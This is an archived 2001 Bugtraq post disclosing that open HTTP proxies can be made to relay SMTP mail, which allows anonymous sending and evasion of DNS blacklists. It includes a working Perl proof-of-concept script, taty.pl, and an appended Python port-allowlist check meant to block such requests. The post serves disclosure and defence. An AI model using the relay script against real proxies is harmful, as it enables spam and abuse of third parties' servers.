[22945] in bugtraq
Non-standard usage of HTTP proxy servers
daemon@ATHENA.MIT.EDU (Alexander Yurchenko)
Mon Oct 22 11:36:57 2001
Date: Mon, 22 Oct 2001 04:34:24 +0400
From: Alexander Yurchenko <grange@rt.mipt.ru>
To: bugtraq@securityfocus.com
Message-ID: <20011022043424.A28461@disorder.grange.ru>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="5mCyUwZo2JvN/JJP"
Content-Disposition: inline
--5mCyUwZo2JvN/JJP
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
I'm sorry if the following things are well-known and not interesting for
you.

The HTML form protocol attack method described by Jochen Topf
<jochen@remote.org> in his post to BugTraq
(http://www.securityfocus.com/cgi-bin/archive.pl?id=1&start=2001-10-17&end=2001-10-23&threads=0&mid=20010815092019.A938@atlantis.remote.org)
can be used in another way. It's possible to connect to one of the
numerous public HTTP proxy servers and send a request like:

    POST http://some.host:25/ HTTP/1.0

giving the SMTP commands as the content. In that way we can send an e-mail
anonymously and trick different DNS black lists. I've attached a simple
perl script showing this technique. We can also do the same things using
other ASCII-based protocols.

Some proxy servers are configured to refuse attempts to connect to such
ports as SMTP, NNTP, POP3, etc., but many of them are not.

So HTTP proxy servers can do more than just retrieving HTML pages.
--
Alexander Yurchenko (aka grange)
--5mCyUwZo2JvN/JJP
Content-Type: application/x-perl
Content-Disposition: attachment; filename="taty.pl"
#!/usr/bin/perl
#
# taty.pl
# A simple script for sending e-mails via HTTP proxy servers
#
# usage: taty.pl < message.txt
# message.txt file contains message to send
#
#
# Alexander Yurchenko <grange@rt.mipt.ru>
#
use IO::Socket;
$proxyhost = 'proxy.com';
$proxyport = '8080';
$smtpserver = 'smtp.com';
$sender = '<myself@hotmail.com>';
$recipient = '<myfriend@hotmail.com>';
local $/ = undef;
$message = <>;
$smtpdata = "HELO $proxyhost\n";
$smtpdata .= "MAIL FROM: $sender\n";
$smtpdata .= "RCPT TO: $recipient\n";
$smtpdata .= "DATA\n";
$smtpdata .= "$message\n.\n";
$smtpdata .= "QUIT\n";
$request = "POST http://$smtpserver:25/ HTTP/1.0\n";
$request .= "Host: $smtpserver\n";
$request .= "Content-type: application/x-www-form-urlencoded\n";
$request .= "Content-length: ".length($smtpdata)."\n\n";
$request .= "$smtpdata";
$socket = IO::Socket::INET->new(PeerAddr => $proxyhost,
                                PeerPort => $proxyport,
                                Proto    => 'tcp',
                                Type     => SOCK_STREAM)
    or die "could not connect to $proxyhost:$proxyport : $!\n";
print $socket $request;
$answer = <$socket>;
close($socket);
print "SMTP session log:\n\n$answer";
--5mCyUwZo2JvN/JJP--
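
The port restriction the post mentions (proxies that refuse connections to SMTP, NNTP, POP3 and similar ports) can be sketched as a request-line check. This is an added example, not part of the original post or its attachment; the allowed port sets, function names and sample hosts are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Assumed policy for this example: the only ports the proxy may reach.
SAFE_HTTP_PORTS = {80, 443, 8080}
SAFE_CONNECT_PORTS = {443}
DEFAULT_PORTS = {"http": 80, "https": 443}

def target_port(method, target):
    """Return the destination port named by a proxy request target, or None."""
    try:
        if method.upper() == "CONNECT":
            # CONNECT carries a bare authority (host:port), not a URL.
            return urlsplit("//" + target).port
        parts = urlsplit(target)
        if parts.port is not None:
            return parts.port
        return DEFAULT_PORTS.get(parts.scheme.lower())
    except ValueError:
        return None  # malformed or out-of-range port: treat as unknown

def allow_request(request_line):
    """Allow a request only if its destination port is on the allowlist."""
    fields = request_line.split()
    if len(fields) != 3:
        return False
    method, target, _version = fields
    port = target_port(method, target)
    allowed = SAFE_CONNECT_PORTS if method.upper() == "CONNECT" else SAFE_HTTP_PORTS
    return port in allowed

def flag_denied(request_lines):
    """Return the request lines the policy refuses (useful for log review)."""
    return [line for line in request_lines if not allow_request(line)]

# Constructed sample request lines; only the POST line appears in the post.
SAMPLE = [
    "GET http://www.example.com/index.html HTTP/1.0",
    "POST http://some.host:25/ HTTP/1.0",
    "CONNECT mail.example.net:25 HTTP/1.0",
    "CONNECT www.example.com:443 HTTP/1.0",
    "GET http://news.example.org:119/ HTTP/1.0",
    "GET http://[2001:db8::1]:8080/ HTTP/1.0",
]

if __name__ == "__main__":
    for line in flag_denied(SAMPLE):
        print("DENY", line)
```

The check is deny-by-default: a target with no recognisable port, an unknown scheme, or a malformed request line is refused rather than passed through.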